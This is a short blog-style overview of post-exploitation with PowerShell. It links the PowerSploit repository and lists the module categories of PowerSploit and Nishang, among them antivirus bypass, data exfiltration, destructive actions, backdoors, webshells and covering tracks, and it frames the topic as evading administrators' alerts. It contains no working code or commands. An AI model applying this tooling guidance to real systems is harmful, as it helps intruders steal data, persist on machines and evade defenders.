Post Exploitation with PowerShell
Lateral movement can be tricky when you don’t want to trigger any alerts at the Sys Admin’s screen. So what could be better than be cheeky and hide in plain sight? Since Windows 7, PowerShell comes pre-installed on Microsoft’s operating systems and is meant to assist the sysadmins in their daily tasks. Its syntax is very similar to bash on Debian Linux and you can do pretty much everything with it on a Windows system – from adding group-policies on a domain controller to dumping system information to changing passwords.
Normally, to execute scripts, you would have to start a shell with administrative rights, there are a lot of ways to circumvent this policy however.
The most popular tool for post exploitation with powershell is undisuptably PowerSploit (as of 10/01/2019), and should be the first stop in launching post exploitation scripts.
PowerSploit Github: https://github.com/PowerShellMafia/PowerSploit
Powersploit can be broken up into ten kinds of tools:
- CodeExecution – Perform low-level code execution and code injection.
- ScriptModification – Modify and/or prepare scripts for execution on a compromised machine.
- Persistence – Add persistence capabilities to a PowerShell script.
- PETools – Parse/manipulate Windows portable executables.
- Capstone – A PowerShell binding for the Capstone Engine disassembly framework.
- ReverseEngineering – A wide range of reverse engineering tools
- AntivirusBypass – Defeat AV byte signatures in executables.
- Exfiltration – Steal sensitive data from a compromised machine.
- Mayhem – Perform destructive actions.
- Recon – Tools to aid in the reconnaissance phase of a penetration test.
1. Antak-Webshell – A shell written in ASP.Net
2. Backdoors – Various backdoors
3. Client – Crafted files and documents to send to a victim
4. Escalation – Self-explanatory
5. Execution – Execute commands
6. Gather – Information gathering on a targt
7. Misc – Funny stuff
8. Pivot – Self-explanatory
9. Prasadhak – Compare files with md5 hashes
10. Scan – Brute force and port scan
11. Shells – Invoke various shell
12. Utility – Various scripts helping cover your tracks
13. Powerpreter – Assisting in deployment of shells, files, etc…
Nishang is a bit more offensive in a way that this collection of tools is able to assist in the actual process of exploiting a system for example with drive-by downloads. Both Powersploit and Nishang are heavily maintained and constantly developed further to extend their functionality.
A little older but worth mentioning is PoshSec. It is meant as a graphical front end for dealing with PowerShell.